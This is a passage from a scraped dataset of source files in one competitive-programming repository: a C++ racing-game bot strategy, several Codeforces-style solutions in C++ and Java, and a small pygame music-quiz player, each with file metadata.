14 : 100;\r\n if (is4(path))\r\n forceSlow *= 1.5;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.3;\r\n if (is3_2(path))\r\n dd /= 2;\r\n if (is212(path))\r\n dd /= 2;\r\n if (is41(path))\r\n dd *= 1.2;\r\n bool fas = is131(path) && speedModule > 16.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11) || fas)\r\n move.setBrake(true);\r\n }\r\n }\r\n cout << \"END OF MOVE\\n\";\r\n cout.flush();\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n if (forceRight == 0 && forceBack == 0 && planB)\r\n {\r\n if (angleToWaypoint > 0)\r\n angleToWaypoint = PI - angleToWaypoint;\r\n else\r\n angleToWaypoint = -PI + angleToWaypoint;\r\n turn = getTurn(32);\r\n cout << \"PLANB\\n\";\r\n }\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]) && planB == 0)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n bool okSnake = false;\r\n if (snake && path.size() >= 2)\r\n {\r\n int count = 0;\r\n vector<int> fff = {\r\n directions[make_pair(path[0].first - path[1].first, 
path[0].second - path[1].second)],\r\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\r\n };\r\n for (int i = 2; i < path.size(); ++i)\r\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\r\n count++;\r\n else\r\n break;\r\n cout << count << \"\\n\";\r\n okSnake = count >= 9;\r\n }\r\n if (forceRight == 0 && forceBack == 0 && world.getTick() > 195 && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0)\r\n move.setUseNitro(true);\r\n#ifdef vis\r\n cout << \"VISUALIZATION\\n\";\r\n cout.flush();\r\n for (int i = 0; i < a.size(); ++i)\r\n for (int j = 0; j < a[0].size(); ++j)\r\n if (a[i][j] == UNKNOWN)\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xCC0000);\r\n else if (visited[i][j])\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0x008800);\r\n for (auto p : wp)\r\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), 0x0000CC);\r\n\r\n visual.fillRect(get(ti), get(tj), get(ti + 1), get(tj + 1), 0x008888);\r\n visual.endPre();\r\n visual.beginPost();\r\n visual.circle(getCenter(ti), getCenter(tj), 600, 0x54618f);\r\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\r\n char sss[45];\r\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\r\n visual.text(self.getX() + 120, self.getY() + 120, sss);\r\n sss[44] = 0;\r\n //char qqq[35];\r\n //int ttt = 0;\r\n //for (auto ee : bad)\r\n //ttt += sprintf(qqq + ttt, \"%d %d, \", ee.first, ee.second);\r\n //for (int i = 0; i < 35; ++i)\r\n //qqq[i] = ' ';\r\n //qqq[34] = 0;\r\n //visual.text(self.getX() + 120, self.getY() + 200, qqq);\r\n for (int i = 1; i < min(10, int(path.size())); ++i)\r\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\r\n visual.line(getCenter(pi), getCenter(pj), 
getCenter(ti), getCenter(tj), 0x00ff00);\r\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\r\n visual.fillCircle(getCenter(ti), getCenter(tj), 10);\r\n visual.endPost();\r\n#endif\r\n cout << \"END OF MOVE\\n\";\r\n cout.flush();\r\n }\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n directions[make_pair(1, 0)] = RIGHT;\r\n directions[make_pair(-1, 0)] = LEFT;\r\n directions[make_pair(0, 1)] = DOWN;\r\n directions[make_pair(0, -1)] = UP;\r\n#define rht RIGHT_HEADED_T\r\n#define lht LEFT_HEADED_T\r\n#define tht TOP_HEADED_T \r\n#define bht BOTTOM_HEADED_T\r\n#define cr CROSSROADS\r\n dir[VERTICAL][UP] = dir[VERTICAL][DOWN] = true;\r\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\r\n\r\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\r\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\r\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\r\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\r\n\r\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\r\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\r\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\r\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\r\n\r\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n#ifdef debug\r\n writeln(FUUUUU);\r\n#endif\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\r\n" }, { "alpha_fraction": 0.4787123501300812, "alphanum_fraction": 0.4941156208515167, "avg_line_length": 33.447853088378906, "blob_id": "c3f02c14287b19f0cab93da8493d1989d8e1c7c5", "content_id": "46293f739a7336db06167cde6c48b525d4382c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5778, "license_type": "no_license", 
"max_line_length": 165, "num_lines": 163, "path": "/CodeForce/0677/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\r\n#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\r\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\r\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\r\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\r\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\r\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\r\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\r\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\r\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\r\n\r\n#define ll long long\r\n#define pb push_back\r\n#define vi vector<int>\r\n#define pii pair<int, int>\r\n#define vll vector<long long>\r\n#define pll pair<long long, long long>\r\n#define whole(a) a.begin(), a.end()\r\n#define next next__\r\n#define prev prev__\r\n#define count count__\r\n#define argmax(a) (max_element(whole(a)) - (a).begin())\r\n#define argmin(a) (min_element(whole(a)) - (a).begin())\r\n\r\n#define ints(a...) int a; readln(a)\r\n#define lls(a...) ll a; readln(a)\r\n#define wr(args...) err(split(#args,',').begin(),args)\r\n \r\n#define FILENAME \"input\"\r\n#define INF 1000000007\r\n \r\n#define tthti template<typename Head, typename... Tail> inline\r\n#define ttt12i template<typename T1, typename T2> inline\r\n#define ttti template<typename T> inline\r\n\r\ninline void writeln2(){cout<<\"\\n\";}\r\ninline void writeln() {cout<<\"\\n\";}\r\ninline void readln() {}\r\nttti void read(T&);\r\nttti void priws(T);\r\nttti void print(T);\r\n\r\nvoid err(vector<string>::iterator it){++it;}\r\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\r\ntthti void writeln2(Head head, Tail... 
tail){print(head);writeln2(tail...);}\r\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\r\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\r\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\r\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\r\n\r\n///-------------------------------------------------------------------------------------------------------------------------------------\r\n//Igorjan\r\n\r\nint d[303][303];\r\n\r\nvoid run()\r\n{\r\n ints(n, m, p);\r\n\tvector<vector<pii>> a(p);\r\n int x;\r\n fori(n)\r\n forj(m)\r\n scanf(\"%d\", &x),\r\n d[i][j] = INF,\r\n a[--x].pb({i, j});\r\n vector<pii> start = {{0, 0}};\r\n vector<int> dx = {-1, 1, 0, 0};\r\n vector<int> dy = {0, 0, -1, 1};\r\n fori(p)\r\n {\r\n vector<pii> prev = i == 0 ? start : a[i - 1];\r\n if (int(prev.size()) * int(a[i].size()) > n * m)\r\n {\r\n vector<vector<int>> used(n, vector<int>(m, INF));\r\n vector<pair<int, pii>> list;\r\n for (auto pp : prev)\r\n list.pb({d[pp.first][pp.second], pp});\r\n sort(whole(list));\r\n int pointer = 1;\r\n queue<pair<int, pii>> q;\r\n q.push(list[0]);\r\n used[list[0].second.first][list[0].second.second] = list[0].first;\r\n while (q.size())\r\n {\r\n int u = q.front().second.first;\r\n int v = q.front().second.second;\r\n int val = q.front().first;\r\n q.pop();\r\n while (pointer < int(list.size()) && list[pointer].first <= val)\r\n used[list[pointer].second.first][list[pointer].second.second] = list[pointer].first,\r\n q.push(list[pointer++]);\r\n forj(4)\r\n {\r\n int tox = u + dx[j];\r\n int toy = v + dy[j];\r\n if (tox >= 0 && toy >= 0 && tox < n && toy < m && used[tox][toy] == INF)\r\n used[tox][toy] = min(used[tox][toy], used[u][v] + 1),\r\n q.push({val + 1, {tox, toy}});\r\n }\r\n }\r\n for (auto pp : a[i])\r\n 
d[pp.first][pp.second] = used[pp.first][pp.second];\r\n }\r\n else \r\n for (auto& from : prev)\r\n for (auto& to : a[i])\r\n d[to.first][to.second] = min(d[to.first][to.second],\r\n (i == 0 ? 0 : d[from.first][from.second]) + abs(to.first - from.first) + abs(to.second - from.second));\r\n }\r\n writeln(d[a[p - 1][0].first][a[p - 1][0].second]);\r\n}\r\n\r\nint main()\r\n{\r\n#ifndef ONLINE_JUDGE\r\n double time = clock();\r\n#endif\r\n //ios_base::sync_with_stdio(false);\r\n// freopen(FILENAME\".in\", \"r\", stdin);\r\n// freopen(FILENAME\".out\", \"w\", stdout);\r\n run();\r\n#ifndef ONLINE_JUDGE\r\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\r\n#endif\r\n return 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#define a _a\r\n#define n _n\r\nttti ostream&operator<<(ostream&os,vector<T>&a);\r\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\r\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\r\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\r\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\r\nttti void print(T a){cout<<\" \"<<a;}\r\nttti void priws(T a){cout<<a;}\r\nttti void read(T& a){cin>>a;}\r\n" }, { "alpha_fraction": 0.42222222685813904, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 8, "blob_id": "2ebffe59a59ff38baa731f74e57bef90268d730a", "content_id": "144ba97e26dfcbe35ce2d29a84be391aef06049e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 11, "num_lines": 5, "path": "/trains/train2015western/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = 
input()\nn = len(s)\na = [0] * n\n\nprint(a)\n" }, { "alpha_fraction": 0.47021329402923584, "alphanum_fraction": 0.4827163517475128, "avg_line_length": 29.90151596069336, "blob_id": "526531d786e8798cf54c49550d8db36bda0225f0", "content_id": "c4415fe92d9a6e36017d0710f465b7e56c53311f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4079, "license_type": "no_license", "max_line_length": 108, "num_lines": 132, "path": "/ovo/main.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport random\nimport pygame\n\nclass Ovochschevoz():\n currentSong = None\n isStarted = None\n\n def nextSong(self):\n if self.currentSong and self.isStarted:\n print(self.currentSong)\n print('-------------------')\n print()\n\n self.currentSong = self.current_list.pop(0)\n pygame.mixer.music.load(os.path.join(self.directory, self.currentSong))\n self.isPlaying = False\n self.isStarted = False\n self.length = 1\n self.startTime = random.randint(0, 60)\n self.timer = 0\n self.setTitle()\n \n def setTitle(self):\n self.title = self.font.render(f'{round(self.timer / 1000, 1)} / {self.length}', True, (255, 255, 0))\n\n def pause(self):\n self.isPlaying = False\n pygame.mixer.music.pause()\n\n def unpause(self):\n self.isPlaying = True\n if self.timer > 0:\n pygame.mixer.music.unpause()\n else:\n self.play()\n\n def play(self, later = None):\n pygame.mixer.music.rewind()\n pygame.mixer.music.play()\n if later is None:\n pygame.mixer.music.set_pos(self.startTime)\n else:\n pygame.mixer.music.set_pos(self.startTime + self.length)\n self.timer = self.length * 1000\n self.length *= 2\n\n self.isPlaying = True\n self.isStarted = True\n\n def stop(self):\n if self.isPlaying:\n self.isPlaying = False\n self.timer = 0\n pygame.mixer.music.stop()\n\n def increase(self, mul = False):\n if mul:\n self.length *= 2\n else:\n self.length += 1\n self.setTitle()\n\n def decrease(self):\n if self.length > 1:\n self.length -= 1\n 
self.setTitle()\n\n def __init__(self):\n self.title = ''\n self.directory = '/home/igorjan/documents/music'\n play_list = [f for f in os.listdir(self.directory) if f.endswith('.mp3')]\n self.current_list = play_list[:]\n random.shuffle(self.current_list)\n\n pygame.init()\n pygame.mixer.music.set_volume(0.1)\n self.window = pygame.display.set_mode((800, 100))\n self.font = pygame.font.SysFont(None, 40)\n self.clock = pygame.time.Clock()\n\n window_center = self.window.get_rect().center\n\n self.nextSong()\n\n run = True\n while run:\n t = self.clock.tick(100)\n if self.isPlaying:\n self.timer += t\n self.setTitle()\n if self.timer >= self.length * 1000:\n self.stop()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.unicode:\n if event.unicode == ' ':\n if self.isPlaying:\n self.pause()\n else:\n self.unpause()\n elif event.unicode == '$' or event.unicode == '4':\n if not self.isPlaying:\n self.play(True)\n elif event.unicode == '*' or event.unicode == '8':\n self.increase(True)\n elif event.unicode == '+' or event.unicode == '=':\n self.increase()\n elif event.unicode == '-':\n self.decrease()\n elif event.unicode == '@' or event.unicode == '2':\n if not self.isPlaying:\n self.nextSong()\n else:\n print(event.unicode)\n self.stop()\n\n if event.type == pygame.QUIT:\n self.nextSong()\n run = False\n \n\n self.window.fill(0)\n if self.title:\n self.window.blit(self.title, self.title.get_rect(center = window_center))\n pygame.display.flip()\n \n pygame.quit()\n exit()\n\nif __name__ == '__main__':\n Ovochschevoz()\n" }, { "alpha_fraction": 0.47229915857315063, "alphanum_fraction": 0.4729916751384735, "avg_line_length": 23.474576950073242, "blob_id": "70f1cb8aa2551a67123d2a894108f7ddb01c1bc0", "content_id": "29a1a40367768d5a93cc7bb3427be8ff16dac081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1444, "license_type": "no_license", "max_line_length": 83, "num_lines": 59, "path": 
"/2015/RCC1A/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\nimport java.math.*;\n\npublic class Template {\n FastScanner in;\n PrintWriter out;\n\n public void solve() throws IOException {\n BigInteger x = new BigInteger(in.next());\n BigInteger y = new BigInteger(in.next());\n BigInteger z = new BigInteger(in.next());\n System.out.println(x.multiply(y).equals(z) ? \"Infinity\" : \"Finite\"); \n }\n\n public void run() {\n try {\n in = new FastScanner();\n int i = in.nextInt();\n while (i --> 0)\n solve();\n\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n\n FastScanner() {\n try {\n br = new BufferedReader(new InputStreamReader(System.in));\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n\n public static void main(String[] arg) {\n new Template().run();\n }\n}\n" }, { "alpha_fraction": 0.49260303378105164, "alphanum_fraction": 0.503786563873291, "avg_line_length": 29.363636016845703, "blob_id": "aec8e01af99366cecb00028fa598edfce974ba33", "content_id": "665eb43975ac1b5764a3d6798962864fd9aa8fea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11356, "license_type": "no_license", "max_line_length": 174, "num_lines": 374, "path": "/2022/snws2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binpow\ntemplate<typename T>\nT binpow(T a, ll n)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res *= a;\n a *= a;\n n >>= 1;\n }\n return res;\n}\n\n//matrix\ntemplate<typename T>\nstruct matrix\n{\n#define vectorOrValarray template<template<typename> typename C, typename = enable_if_t<is_same<vector<T>, C<T>>::value || is_same<valarray<T>, C<T>>::value>>\n friend void swap(matrix& lhs, matrix& rhs)\n {\n swap(lhs.n, rhs.n);\n swap(lhs.m, rhs.m);\n swap(lhs.a, rhs.a);\n }\n\n matrix(int n, int m) : n(n), m(m)\n {\n a.resize(n, valarray(T(), m));\n fori(::min(n, m)) a[i][i] = T(1);\n }\n\n matrix(int n, int m, const T& initial) : n(n), m(m)\n {\n a.resize(n, valarray(initial, m));\n }\n\n matrix(const vector<vector<T>>& rhs)\n {\n n = size(rhs);\n m = n == 0 ? 0 : size(rhs[0]);\n a.resize(n, valarray(T(), m));\n fori(n) forj(m) a[i][j] = rhs[i][j];\n }\n \n matrix(const vector<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const valarray<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const matrix<T>& rhs) : n(rhs.n), m(rhs.m), a(rhs.a) {}\n\n matrix& operator=(const matrix& rhs)\n {\n if (&rhs == this)\n return *this;\n matrix temp(rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const T& rhs)\n {\n matrix temp(n, m, rhs);\n swap(*this, temp);\n return *this;\n }\n\n vectorOrValarray matrix& operator=(const C<T>& rhs)\n {\n matrix temp(size(rhs), 1, 0);\n fori(temp.n) a[i][0] = rhs[i];\n swap(*this, temp);\n return *this;\n }\n\n valarray<T>& operator[](int i) { return a[i]; }\n const valarray<T>& operator[](int i) const { return a[i]; }\n\n matrix& operator+=(const matrix& rhs) { a += rhs.a; return *this; }\n matrix& operator-=(const matrix& rhs) { 
a -= rhs.a; return *this; }\n matrix& operator+=(const T& rhs) { fori(n) a[i] += rhs; return *this; }\n matrix& operator-=(const T& rhs) { fori(n) a[i] -= rhs; return *this; }\n matrix& operator*=(const T& rhs) { fori(n) a[i] *= rhs; return *this; }\n matrix& operator/=(const T& rhs) { fori(n) a[i] /= rhs; return *this; }\n matrix& operator%=(const T& rhs) { fori(n) a[i] %= rhs; return *this; }\n matrix& operator*=(const matrix& rhs) {\n assert(m == rhs.n);\n matrix temp(n, rhs.m, 0);\n fori(n) forj(m) forn(k, rhs.m) temp.a[i][k] += a[i][j] * rhs[j][k];\n return *this = temp;\n }\n\n matrix& operator|=(const matrix& rhs) {\n assert(n == rhs.n);\n matrix temp(n, m + rhs.m, 0);\n fori(n) forj(m) temp[i][j] = a[i][j];\n fori(n) forj(rhs.m) temp[i][j + m] = rhs[i][j];\n return *this = temp;\n }\n\n matrix& operator^=(ll i) {\n assert(i >= 0);\n if (i == 0) return *this = matrix(n, m);\n return *this = binpow(*this, std::abs(i));\n }\n vectorOrValarray C<T> operator*(const C<T>& rhs) {\n assert(m == size(rhs));\n C<T> ans(n);\n fori(n) forn(k, m) ans[i] += a[i][k] * rhs[k];\n return ans;\n }\n vectorOrValarray friend C<T> operator*(const C<T>& lhs, const matrix& rhs) {\n assert(size(lhs) == rhs.n);\n C<T> ans(rhs.m);\n forj(rhs.m) forn(k, rhs.n) ans[j] += lhs[k] * rhs[k][j];\n return ans;\n }\n matrix operator-() { return *this *= -1; }\n\n friend matrix operator+(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator*(matrix lhs, const matrix& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator|(matrix lhs, const matrix& rhs) { lhs |= rhs; return lhs; }\n friend matrix operator+(matrix lhs, const T& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const T& rhs) { lhs -= rhs; return lhs; }\n friend matrix operator*(matrix lhs, const T& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator/(matrix lhs, const T& rhs) { lhs /= 
rhs; return lhs; }\n friend matrix operator%(matrix lhs, const T& rhs) { lhs %= rhs; return lhs; }\n friend matrix operator^(matrix lhs, const ll& rhs) { lhs ^= rhs; return lhs; }\n vectorOrValarray matrix operator|=(const C<T>& rhs) { return *this |= matrix(rhs); }\n T max() { return a.max(); }\n T min() { return a.min(); }\n T sum() { return a.sum(); }\n\n matrix transpose() {\n matrix temp(m, n, 0);\n fori(n) forj(m) temp[i][j] = a[j][i];\n return temp;\n }\n\n T normalize(int index) {\n T g = 1;\n bool found = false;\n for (T& x: a[index])\n if (x != 0)\n {\n if (not found) g = x, found = true;\n else g = gcd(g, x);\n }\n a[index] /= g;\n return g;\n }\n\n void normalize() {\n fori(n) normalize(i);\n }\n\n T determinant() {\n matrix temp(*this);\n T numerator = 1;\n T denumerator = 1;\n fori(n)\n {\n int nonZero = i;\n while (nonZero < n && !temp[nonZero][i]) ++nonZero;\n if (nonZero == n) return 0;\n\n swap(temp[i], temp[nonZero]);\n numerator *= temp[i][i];\n\n FOR(j, i + 1, n)\n if (temp[j][i])\n {\n T g = gcd(temp[i][i], temp[j][i]);\n denumerator *= temp[i][i] / g;\n temp[j] = temp[j] * (temp[i][i] / g) - temp[i] * (temp[j][i] / g);\n }\n }\n writeln(temp); writeln();\n return numerator / denumerator;\n }\n\n optional<pair<T, matrix<T>>> invert() {\n assert(n == m);\n matrix temp(*this);\n temp |= matrix(n, n);\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n matrix ret(n, n, 0);\n auto s = slice(n, n, 1);\n fori(n) ret[i] = temp[i][s];\n return pair(det.value(), ret);\n }\n\n vectorOrValarray optional<pair<T, C<T>>> solution(const C<T>& b) {\n assert(n == m);\n matrix temp(*this);\n temp |= b;\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n C<T> ret(0, n);\n fori(n) ret[i] = temp[i][n];\n return pair(det.value(), ret);\n }\n\n friend ostream& operator<<(ostream& os, matrix rhs) {\n fori(rhs.n)\n {\n os << rhs.a[i];\n if (i != rhs.n - 1) os << \"\\n\";\n }\n return os;\n }\n friend istream& operator>>(istream& is, 
matrix& rhs) {\n fori(rhs.n) is >> rhs.a[i];\n return is;\n }\n\nprivate:\n valarray<valarray<T>> a;\n int n, m;\n\n static optional<T> solve(matrix& temp) {\n vector<int> permutation(temp.n);\n iota(all(permutation), 0);\n\n auto get = [&](int i, int j) {\n return temp[permutation[i]][j];\n };\n auto findNonZero = [&](int i) {\n int nonZero = i;\n while (nonZero < temp.n && !get(nonZero, i)) ++nonZero;\n return nonZero;\n };\n fori(temp.n)\n {\n int nonZero = findNonZero(i);\n if (nonZero == temp.n) return {};\n swap(permutation[i], permutation[nonZero]);\n FOR(j, i + 1, temp.n)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n }\n ROF(i, temp.n - 1, 0)\n ROF(j, i - 1, 0)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n fori(temp.n) temp.normalize(i);\n T mx = 0;\n fori(temp.n) mx = std::max(mx, abs(get(i, i)));\n fori(temp.n) temp[permutation[i]] *= mx / get(i, i);\n matrix ret(temp.n, temp.m, 0);\n fori(temp.n) ret[i] = temp[permutation[i]];\n temp = ret;\n return mx;\n }\n};\n\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
l : r;\n}\n\n//}}}\n\nvoid run()\n{\n ints(n, k);\n double p;\n readln(p);\n vector<int> f(n + 7, -1);\n fori(k)\n {\n ints(from, to); --from; --to;\n f[from] = to;\n }\n matrix<double> m(n, n, 0.0);\n fori(n)\n forj1(7)\n {\n int l = i + j; if (f[l] != -1) l = f[l]; l = min(n - 1, l);\n m[i][l] += 1.0 / 6.0;\n }\n\n writeln(binSearch(1, 100000001, [&](int x) {\n auto ans = m ^ x;\n return ans[0][n - 1] >= p;\n }));\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n cout << fixed << setprecision(15);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3012048304080963, "alphanum_fraction": 0.34939759969711304, "avg_line_length": 